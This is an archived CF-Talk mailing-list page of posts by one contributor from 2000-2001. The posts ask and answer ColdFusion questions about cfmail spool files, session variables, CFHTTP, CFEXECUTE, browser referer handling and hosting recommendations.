CF5 Sporadic parser errors

2001-08-16 Thread Tim Bahlke

We've had CF 5 running on a Win2K box for 2 days now with code we brought over from 
4.5 and NT4.  Twice we started getting parser errors on, what seems like, random 
templates.  When we cycle the services all seems to be right with the world again.

Anyone have any ideas why this is happening?

Tim Bahlke

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



RE: CF Stock Quotes

2001-07-30 Thread Tim Bahlke

moreovernews.com offers stocks - they actually use yahoo!  They're available in wddx 
and it's free.  

Tim Bahlke

> -Original Message-
> From: nyon [mailto:[EMAIL PROTECTED]]
> Sent: Sunday, July 29, 2001 10:40 PM
> To: CF-Talk
> Subject: Re: CF Stock Quotes
> 
> 
> Hi,
> 
> I need some free live stock quotes without the normal 
> 'powered by' stuff for
> some companies listed in Nasdaq.
> 
> Thanks
> nyon
> 
> 
>
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



cfmail

2001-07-25 Thread Tim Bahlke

We have a serious problem with regards to sending email through cf.  Every once and 
again we will get a call from someone informing us that they have received hundreds of 
copies of the same email.  Upon investigation, we find entries stuck in the spool.ini 
file, emails that have been sent but for some reason or another the entries were saved 
in the file.

We are sending the mail via our exchange server.

Yesterday, we had an instance where an email was send to a mailbox that is full, and 
hence the emails are getting bounced back to us undeliverable.  We received a bunch of 
these emails so we checked the spool.ini file and sure enough, there was an entry 
while no emails were waiting to go out.

We deleted this entry like we always do, thinking this would solve the problem like it 
usually does.  However, the emails kept on coming - thousands of them!  We cycled the 
cf services and rebooted the machine in an effort to alleviate the problem.  While the 
cf box was rebooting - we kept it down for about 5 minutes - the emails still kept 
coming in.  So, I am guessing by this behavior that the cf box is no longer sending 
the emails, but they are stuck in a queue someplace - or something like that.

My question is, have any of you witnessed this type of behavior before?  How can we 
fix it?  What's causing it?

I appreciate any help y'all can give.

Tim Bahlke


~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



RE: Session hijacking - help!

2001-06-27 Thread Tim Bahlke

This is probably a very rudimentary question but, do you have session variables locked?

Tim Bahlke

> -Original Message-
> From: Scott Weikert [mailto:[EMAIL PROTECTED]]
> Sent: Wednesday, June 27, 2001 4:13 PM
> To: CF-Talk
> Subject: Session hijacking - help!
> 
> 
> Hey gang,
> 
> I've got a really WEIRD thing going on... a true stumper.
> 
> Got a CF/SQL7 box. It's sitting on a client's internal LAN. 
> Hence, their
> users on their LAN (and they're nationwide - I believe users 
> in the field
> dial in and/or have dedicated lines, I'm not 100% sure - not 
> my problem) hit
> this box pretty quick when they're using the app that's 
> running on it (it's
> a computer-based training app).
> 
> The app keeps track of users via session variables - tuck the 
> userID in a
> session var, etc. No sweat.
> 
> The thing is... occasionally, when there are multiple people 
> accessing the
> training app at the same time, sessions get hijacked. To wit:
> 
> Joe is in the training app. His 'session.userid' is 123.
> Mary comes along, logs in, starts using the app. Her userid is 456.
> At some point, Joe's computer all of a sudden thinks its 
> session.userid is
> 456 - Mary's.
> 
> Why?
> 
> On top of all this... this only happens INSIDE THEIR LAN. 
> Those of us on the
> outside (in our office, and in the office of the partner company who
> develops the content for the system) have NO problems like this.
> 
> I've put in some debug display code and would have the company's
> propellerheads go through the app, from within their LAN, and 
> boom - the
> output of the session.userid changes. The IP info for the 
> client boxes is
> fine - I was spitting that out with the rest of the info - and it went
> unchanged.
> 
> I understand that session info is stored in the server's RAM. I'm
> considering trying to swap over to a client variable-based method, and
> storing that info in the database.
> 
> Thoughts?
> --Scott
> 
> 
>
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



RE: JS, http_referer and browser hell...

2001-06-26 Thread Tim Bahlke

I am having the opposite problem. I can read http_referer in IE but not in NN - in a 
frameset.

-- Tim Bahlke

> - Original Message -
> From: "Martin Cadirola" <[EMAIL PROTECTED]>
> To: "CF-Talk" <[EMAIL PROTECTED]>
> Sent: Thursday, December 21, 2000 11:42 PM
> Subject: JS, http_referer and browser hell...
> 
> 
> > Hello there!
> >
> > I'm using a window.open() javascript function to pop up a 
> window. These
> > new window needs to be "bookmark safe", so that I'm doing a
> > cgi.http_referer check to allow viewing for only those 
> users who logged
> > in to the site first.
> >
> > Using Netscape, this thing works just fine. Of course, if I 
> use IE, it
> > goes kaboom: the http_referer variable gets lost when the 
> page is called
> > with this javascript command.
> >
> > I'd prefer avoiding session variables. So I thought of 
> checking with you
> > guys for feedback.
> >
> > I'd appreciate any suggestions. Thanks soo much!
> >
> > Cheers,
> >
> >
> > Martin
 

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



cgi.http_referer in NN

2001-06-22 Thread Tim Bahlke

I can't read cgi.http_referer in NN - in a frameset.  Is this only available in IE?

Thanks,
Tim Bahlke

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



RE: Hosting Recommendation

2001-06-12 Thread Tim Bahlke

I too have used CrystalTech and would also recommend.

Tim Bahlke

> -Original Message-
> From: Claremont, Timothy S [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, June 12, 2001 12:13 PM
> To: CF-Talk
> Subject: Hosting Recommendation
> 
> 
> I just wanted to throw into the arena that I have my CF 
> hosting done through
> CrystalTech, and have had flawless service over the last year.
> 
> I have no incentive whatsoever in recommending the company. I 
> just wanted to
> mention that they are worth looking into.
> 
> Tim
> 
>
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



Entries in Spool folder

2001-06-06 Thread Tim Bahlke

Every once and awhile I'll look at the spool.ini file and see entries like those 
below.  Can someone share with me what these are and why they would remain in the file?

C:\CFUSION\MAIL\spool\15B.cfmail=1
C:\CFUSION\MAIL\spool\16A0.cfmail=1
C:\CFUSION\MAIL\spool\2EF.cfmail=1
C:\CFUSION\MAIL\spool\DA.cfmail=1

Thanks,

Tim Bahlke

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



RE: session and client variables

2001-06-01 Thread Tim Bahlke

Paul,

When a cookie is created with no expiration it is destroyed when the browser is 
closed.  This is referred to as a 'session cookie'.

-- Tim Bahlke

> -Original Message-
> From: Paul Johnston [mailto:[EMAIL PROTECTED]]
> Sent: Friday, June 01, 2001 11:38 AM
> To: CF-Talk
> Subject: Re: session and client variables
> 
> 
> All you appear to be doing is reading and writing the cookies.
> 
> Exactly how does this stop the user closing the browser and 
> not having the
> cookie's destroyed?
> 
> When the user re-starts the browser and goes to that page, 
> the cookies still
> exist (as far as I can tell).
> 
> Paul 

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



CFHTTP post to a post

2001-06-01 Thread Tim Bahlke

I have a template which executes a cfhttp post to a cgi script that then post to 
another cgi script.  I want to get the results from this 2nd cgi script.  

When I read the cfhttp.filecontent I am seeing the results of the first cgi script.  
Does anyone know of a way where I can use a cfhttp post and read the results from that 
second cgi script?

Thanks,

Tim Bahlke

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



RE: CF-driven In-browser HTML editor

2001-05-18 Thread Tim Bahlke


> First question:  Has anyone out there seen a Cold Fusion tag 
> or app driving an
> in-browser HTML editor for folks who need to submit content 
> to a web page but
> don't know HTML?

We use HTMLAREA by iAutomated, http://www.iautomated.com/store/default.cfm?iid=2.  
Pretty happy with it so far.

-- Tim Bahlke

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



CF Performance Tuning

2001-05-18 Thread Tim Bahlke

Good Morning List

I have read posts talking about Allaire Consultants that come into a company and play 
around with your CF setup in the hopes of boosting performance.  We are thinking about 
bringing in such a person.  I'm fishing for information on how we set something like 
this up.  Is it through Allaire/MM directly or do we need to get in touch with an 
Allaire Partner in our area (NC)?  If we need to get in touch with a partner locally, 
can anyone pass along some recommendations?

Thanks,.

Tim Bahlke

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



Certified Developers listing on Allaire

2001-05-15 Thread Tim Bahlke

How long after one certifies does it take to get listed on Allaire's site?

Thanks,
Tim Bahlke

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



CF 4.5 - PC Mag's Editor's Choice

2001-05-07 Thread Tim Bahlke

http://www.zdnet.com/pcmag/stories/reviews/0,6755,2713481,00.html

--Tim Bahlke

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



RE: SLIGHTLY OT: Content Management systems

2001-05-03 Thread Tim Bahlke


> Can anyone recommend a content management system?
> * and approximate price ranges.

I've used Xpedio Content Server from IntraNet Solutions
(http://www.intranetsolutions.com/products/xpedio.html) with a client
before.  It's expensive but can do it *all*.  Can't remember the exact
price, but it's up there! 

Documentum, http://www.documentum.com, is another good one from what I hear.
Do not have direct experience with it.

Tim Bahlke

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



RE: CFExcute doesn't run EXEs

2001-04-19 Thread Tim Bahlke

This doesn't help, but I've had the same problem.  I'd be interested in
reading the solution as well.

-- Tim Bahlke

> -Original Message-
> From: Michael Lugassy [mailto:[EMAIL PROTECTED]]
> Sent: Thursday, April 19, 2001 11:27 AM
> To: CF-Talk
> Subject: Re: CFExcute doesn't run EXEs
> 
> 
> Still nothing. everyone has fullaccess to all participating
> directories. I brough back the exe file and tried to run it
> directly. this is the error cf produced:
> 
> Windows NT error 5 occurred.
> 
> Help!?
> 
> - Original Message -
> From: "Terry Bader" <[EMAIL PROTECTED]>
> To: "CF-Talk" <[EMAIL PROTECTED]>
> Sent: Thursday, April 19, 2001 3:43 PM
> Subject: RE: CFExcute doesn't run EXEs
> 
> 
> > does the CF system user have access to the .exe and the 
> logs directory?
> > you said the internet user which im assuming you mean the 
> IIS service
> does,
> > but the CF system user would be the one running the exe...
> >
> > if nothing else, try and make them Everyone rwx and see if 
> it runs...
> >
> > Terry Bader
> > IT/Web Specialist
> > EDO Corp - Combat Systems
> > (757) 424-1004 ext 361 - Work
> > [EMAIL PROTECTED]
> >
> >
> > (757)581-5981 - Mobile
> > [EMAIL PROTECTED]
> > icq: 5202487   aim: lv2bounce
> > http://www.cs.odu.edu/~bader
> >
> >
> >
> >
> >
> >
> > > -Original Message-
> > > From: Michael Lugassy [mailto:[EMAIL PROTECTED]]
> > > Sent: Thursday, April 19, 2001 9:33 AM
> > > To: CF-Talk
> > > Subject: Re: CFExcute doesn't run EXEs
> > >
> > >
> > > Very simple Code:
> > > 
> > >
> > > the arjlogs.bat contains this line (which works great when I
> > > double click it
> > > from explorer):
> > >
> > > c:\inetpub\arj\arj32.exe a -e -hm1 -i -jm -y
> > > c:\inetpub\logs\summary.arj
> > > c:\inetpub\logs\*.log
> > >
> > >
> > >
> > > - Original Message -
> > > From: "Terry Bader" <[EMAIL PROTECTED]>
> > > To: "CF-Talk" <[EMAIL PROTECTED]>
> > > Sent: Thursday, April 19, 2001 2:23 PM
> > > Subject: RE: CFExcute doesn't run EXEs
> > >
> > >
> > > > got code?
> > > >
> > > >
> > > > Terry Bader
> > > > IT/Web Specialist
> > > > EDO Corp - Combat Systems
> > > > (757) 424-1004 ext 361 - Work
> > > > [EMAIL PROTECTED]
> > > >
> > > >
> > > > (757)581-5981 - Mobile
> > > > [EMAIL PROTECTED]
> > > > icq: 5202487   aim: lv2bounce
> > > > http://www.cs.odu.edu/~bader
> > > >
> > > >
> > > >
> > > >
> > > >
> > > >
> > > > > -Original Message-
> > > > > From: Michael Lugassy [mailto:[EMAIL PROTECTED]]
> > > > > Sent: Thursday, April 19, 2001 9:12 AM
> > > > > To: CF-Talk
> > > > > Subject: CFExcute doesn't run EXEs
> > > > >
> > > > >
> > > > > I'm having problems with CFEXCUTE.
> > > > > apperntly I can run stricly bat files that contains
> > > > > commands like: move, copy and such..
> > > > >
> > > > > but I can't seem to run .exe files (not directly with
> > > > > cfexcute, nor with .bat that runs them).
> > > > >
> > > > > The exe file is stored on a foder where
> > > > > INTERNET USER/SYSTEM have both full rights.
> > > > > Also, I've set IIS to run scripts&excutebals on this
> > > > > directory and the directroy that runs the CF template.
> > > > >
> > > > >
> > > > > Anyone?
> > > > >
> > > > > Thanks,
> > > > >
> > > > > Michael Lugassy
> > > > > Interactive Music Ltd.
> > > > >
> > > >
> > >
> >
>
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



RE: Bank of America and e-stores and CFHTTP

2001-04-19 Thread Tim Bahlke

Are you posting to a secure page (https)?has a problem with
that.

-- Tim Bahlke

> -Original Message-
> From: Christopher Olive, CIO [mailto:[EMAIL PROTECTED]]
> Sent: Thursday, April 19, 2001 10:16 AM
> To: CF-Talk
> Subject: Bank of America and e-stores and CFHTTP
> 
> 
> has anyone had any particular problems or success using 
> CFHTTP to talk to
> BoA's estores solution?  i haven't been able to get it to 
> work, and their
> techs tell me that people have *definately* used CF in the 
> past to do this.
> 
> i can follow thei rinstructions and use a standard HTML form 
> post to their
> processing URL.  this works successfully.  however, when i 
> try to make it a
> CFHTTP call, i get a "Failed form POST" error from their servers.
> 
> anyone lend a hand?
> 
> chris olive, cio
> cresco technologies
> [EMAIL PROTECTED]
> http://www.crescotech.com
> 
> 
> 
>
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



cf-talk@houseoffusion.com

2001-04-11 Thread Tim Bahlke

I am attempting to call an executable located on another server on my LAN.
When I run the template with the  tag I get the following error
message:

Windows NT error 67 occurred.

Can anyone shed some light on what this means for me?

Thanks,

Tim Bahlke

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



force download ;

2001-03-23 Thread Tim Bahlke

I have a link where a user can download a PowerPoint file.  The link goes to
this page (basically) ...





When I click the link I get the File Download dialog box but it wants to
download the cfm template that called this template (the page with the
link).  It also tries to download the page as a .html file instead of .cfm.

If I call the page with a target="_blank" in the link it downloads the ppt
fine, but them I'm stuck with a browser window open with an error, "The page
cannot be displayed".

Any suggestions?

Thanks,
Tim Bahlke

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



session variable locking question

2001-03-22 Thread Tim Bahlke

In the following code, do I need a lock around the entire cfif statement?







Is it better to declare [lock][lock]
instead of the IsDefined function?

Thanks,

Tim Bahlke

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



RE: Broken Images / Testing for file existence

2001-03-13 Thread Tim Bahlke

There's a custom tag at the exchange, CF_ImgMultifunction -
http://devex.allaire.com/developer/gallery/info.cfm?ID=CA34776B-2830-11D4-AA
9700508B94F380&method=Full, that I've used and has worked well for me.

Tim Bahlke

> -Original Message-
> From: Tony Schreiber [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, March 13, 2001 2:06 AM
> To: CF-Talk
> Subject: Broken Images / Testing for file existence
> 
> 
> I have an application where I list several items on a page 
> and display an
> image for that item based on a reference number (ie, 
> productnum+.jpg). The
> database table does not tell me whether there is an image for 
> that item
> and there are many that do have one.
> 
> I'd like to display an alternate image (or nothing at all) 
> when there is
> no image present, but I can't see using an  for every
> item for 50 or so on a page. Plus, I can't even do that because I'm
> grabbing the images from a different server via http only ( SRC="http://otherserver/path/number.jpg>)...
> 
> How can I avoid displaying broken images?
> 
> 
> Tony Schreiber, Senior Partner  Man and 
> Machine, Limited
> mailto:[EMAIL PROTECTED]   
> http://www.technocraft.com
> 
> http://www.linktoss.com ___The Fastest Way to Send a Link 
> to Anyone!
> http://www.digitacamera.com __DigitA Camera 
> Scripts and Tips
> http://www.is300.net ___The Enthusiast's Home of the 
> Lexus IS300
> http://www.cfug-sfl.org ___South Florida Cold Fusion 
> Users Group
> http://www.simplemessageboard.com ___Free Forum Software for 
> Cold Fusion
>
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



CFHTTP & HTTP 1.0

2001-03-08 Thread Tim Bahlke

A partner we are working with uses name based hosting and needs incoming
request to use HTTP 1.1.  When I send them a request using CFHTTP they come
through using HTTP 1.0.  

Is there a configuration setting on the IIS machine to change this,  or is
this just the way CFHTTP works?

Thanks,

Tim Bahlke

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



RE: Dynamic Image Resize

2001-02-06 Thread Tim Bahlke

It was definitely a jpg.  It was my image.

> -Original Message-
> From: J.J. Merrick [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, February 06, 2001 1:09 PM
> To: CF-Talk
> Subject: RE: Dynamic Image Resize
> 
> 
> Either it was a flash movie that they had just set to 100% or 
> you have found a miracle script out there some where that 
> adds image data on the fly (something that is virtually impossible)
> 
> My money is on the flash movie
> 
> J.J. M
> 
> -- Original Message --
> From: Tim Bahlke <[EMAIL PROTECTED]>
> Reply-To: [EMAIL PROTECTED]
> Date: Tue, 06 Feb 2001 11:41:56 -0500
> 
> >Actually, the script I've seen did not degrade the images at all.
> >
> >Tim Bahlke
> >
> >
> >> -Original Message-
> >> From: Holger Lockertsen [mailto:[EMAIL PROTECTED]]
> >> Sent: Tuesday, February 06, 2001 10:58 AM
> >> To: CF-Talk
> >> Subject: RE: Dynamic Image Resize
> >> 
> >> 
> >> Why would you want that? - Unless you want truly 
> >> crappy-looking images?
> >> 
> >> Although it surely can be done, there's only one way of doing 
> >> this nicely -
> >> and that is to use flash.
> >> 
> >> rgds
> >> 
> >> * Holger Lockertsen, Solutions Developer
> >> * Pixelduck AS - Nedre Slottsgate 5, N-0157 OSLO, Noreg/Norway
> >> * 23 31 03 04 / 91 83 20 51
> >> * [EMAIL PROTECTED]
> >> * http://www.pixelduck.com/
> >> 
> >> 
> >> 
> >> 
> >> > -Original Message-
> >> > From: Tim Bahlke [mailto:[EMAIL PROTECTED]]
> >> > Sent: Tuesday, February 06, 2001 4:00 PM
> >> > To: CF-Talk
> >> > Subject: Dynamic Image Resize
> >> > 
> >> > 
> >> > I have seen a script before that enables images to resize 
> >> as the user
> >> > resizes their browser window.  Does anyone have a snippet of 
> >> > code that can
> >> > do this?
> >> > 
> >> > Thanks,
> >> > 
> >> > Tim Bahlke
> >> > 
> >> >
> >>
> >
>
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



RE: Dynamic Image Resize

2001-02-06 Thread Tim Bahlke

yea, that's the very reason I liked this CF script that I saw.  The
individual that showed me the script picketed it up at a Fast Track class in
Boston a couple years ago.  At the time I was not familiar enough with CF to
know what was going on so the script didn't stick with me.

Tim Bahlke

> -Original Message-
> From: t nelson [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, February 06, 2001 12:24 PM
> To: CF-Talk
> Subject: Re: Dynamic Image Resize
> 
> 
> Tim,
> 
> you could do this without a script like this:
> 
> 
>  
> 
>screen. However, 
> unless you are using a vector based graphics program like 
> flash, your images 
> are going to look like crap since in essence all you are 
> doing is stretching 
> them out and not truly resizing them.
> 
> cheers and good luck,
> 
> nelson
> 
> 
> Original Message Follows
> From: Tim Bahlke <[EMAIL PROTECTED]>
> Reply-To: [EMAIL PROTECTED]
> To: CF-Talk <[EMAIL PROTECTED]>
> Subject: Dynamic Image Resize
> Date: Tue, 06 Feb 2001 10:00:22 -0500
> Received: from [207.31.122.140] by hotmail.com (3.2) with ESMTP id 
> MHotMailBC495EAF0017D820F3ADCF1F7A8C18C80; Tue Feb 06 07:09:41 2001
> Received: from houseoffusion.com ([207.31.122.140])  by 
> www.houseoffusion.com (Post.Office MTA v3.5.3 release 223 
>  ID# 
> 0-54969U100L100S0V35) with ESMTP id com  for 
> <[EMAIL PROTECTED]>;  Tue, 6 Feb 2001 
> 10:18:47 -0500
> From [EMAIL PROTECTED] Tue Feb 06 07:09:43 2001
> Message-id: <BF5F64E0A90BD21192E800A0C9C7307501D8BD19@VULTURE>
> 
> I have seen a script before that enables images to resize as the user
> resizes their browser window.  Does anyone have a snippet of 
> code that can
> do this?
> 
> Thanks,
> 
> Tim Bahlke
>
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



RE: Dynamic Image Resize

2001-02-06 Thread Tim Bahlke

Actually, the script I've seen did not degrade the images at all.

Tim Bahlke


> -Original Message-
> From: Holger Lockertsen [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, February 06, 2001 10:58 AM
> To: CF-Talk
> Subject: RE: Dynamic Image Resize
> 
> 
> Why would you want that? - Unless you want truly 
> crappy-looking images?
> 
> Although it surely can be done, there's only one way of doing 
> this nicely -
> and that is to use flash.
> 
> rgds
> 
> * Holger Lockertsen, Solutions Developer
> * Pixelduck AS - Nedre Slottsgate 5, N-0157 OSLO, Noreg/Norway
> * 23 31 03 04 / 91 83 20 51
> * [EMAIL PROTECTED]
> * http://www.pixelduck.com/
> 
> 
> 
> 
> > -Original Message-
> > From: Tim Bahlke [mailto:[EMAIL PROTECTED]]
> > Sent: Tuesday, February 06, 2001 4:00 PM
> > To: CF-Talk
> > Subject: Dynamic Image Resize
> > 
> > 
> > I have seen a script before that enables images to resize 
> as the user
> > resizes their browser window.  Does anyone have a snippet of 
> > code that can
> > do this?
> > 
> > Thanks,
> > 
> > Tim Bahlke
> > 
> >
>
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



Dynamic Image Resize

2001-02-06 Thread Tim Bahlke

I have seen a script before that enables images to resize as the user
resizes their browser window.  Does anyone have a snippet of code that can
do this?

Thanks,

Tim Bahlke

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



RE: SQL Server Query Designer

2001-01-25 Thread Tim Bahlke

That did it Aaron ... thanks!

> -Original Message-
> From: Aaron Johnson [mailto:[EMAIL PROTECTED]]
> Sent: Thursday, January 25, 2001 9:20 AM
> To: [EMAIL PROTECTED]
> Cc: [EMAIL PROTECTED]
> Subject: RE: SQL Server Query Designer
> 
> 
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Hi Tim,
> 
> I had this exact problem last night.  Download MDAC 2.6 from MS (@
> www.microsoft.com/data/ ), install it, and you'll be fine.
> 
> Aaron Johnson, MCSE, MCP+I
> Allaire Certified ColdFusion Developer
> MINDSEYE, Inc.
> 617.350.0339
> 617.350.8884
> 66172567
> [EMAIL PROTECTED]
> 
>
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



OT: SQL Server Query Designer

2001-01-25 Thread Tim Bahlke

I'm running SQL7 on W2K Professional.  When I try to use the query designer
(right-click on table --> open table) I get an error message stating, "The
query cannot be executed because some files or either missing or not
register".

I have re-installed SQL Server a number of times.  I do have administrator
rights on the machine.

Anyone have any suggestions for me?

Tim

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



RE: question

2001-01-19 Thread Tim Bahlke

Never mind ... In the time it took for the message to post I figured it out.
I guess a good outcome of a slow list, it's encouraging us to find the
answers ourselves.  And, as we all know, you retain more when you figure it
out yourself.  

Just hope you're not under a deadline!!!

Thanks anyway ...

Tim

-Original Message-----
From: Tim Bahlke [mailto:[EMAIL PROTECTED]]
Sent: Friday, January 19, 2001 11:07 AM
To: CF-Talk
Subject:  question

I have the following  tag in my page  ...




The script is executing fine (from what I can tell - I have a try/catch
block around it); however, nothing is getting written to the text.txt file.
I've tried taking the additional arguments out and just having "-s" ... for
I'm not sure if I'm passing the additional arguments correctly, but still
nothing is happening.

Any suggestions ... and while I'm at it, how do I pass arguments to the exe?

Tim Bahlke
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



question

2001-01-19 Thread Tim Bahlke

I have the following  tag in my page  ...




The script is executing fine (from what I can tell - I have a try/catch
block around it); however, nothing is getting written to the text.txt file.
I've tried taking the additional arguments out and just having "-s" ... for
I'm not sure if I'm passing the additional arguments correctly, but still
nothing is happening.

Any suggestions ... and while I'm at it, how do I pass arguments to the exe?

Tim Bahlke


~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



Re: Big companies using CF

2000-12-08 Thread Tim Bahlke


>What sort of server setup did you have? What OS? Was this a cluster?
>

We had CF4.0 on one machine (Win2K), SQL7 on another Win2K box, and 12 media 
servers all Win2K.

4 eastern US
2 central US
3 West coast
1 in Australia
1 in Taiwan
1 in western Europe.

We had between 20,000-25,000 sessions going at any one time.  We were not 
expecting such an interest.

As you can probably tell, this was an internal webcast.  We did have some 
problems, but these were not related to CF.  Had more to do with  the 
stream, bandwidth issues.

The live media portion of the site had an embedded media player and slides 
from the presentations were pushed out to the users via an admin interface.

We did another one this past Tuesday with the same setup but this one only 
had ~15,000 users.

Tim Bahlke
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



RE: Big companies using CF

2000-12-07 Thread Tim Bahlke

>How much traffic does their site receive? daily, weekly, monthly.
>
>How much of that traffic is hitting dynamic CF generated pages?
>
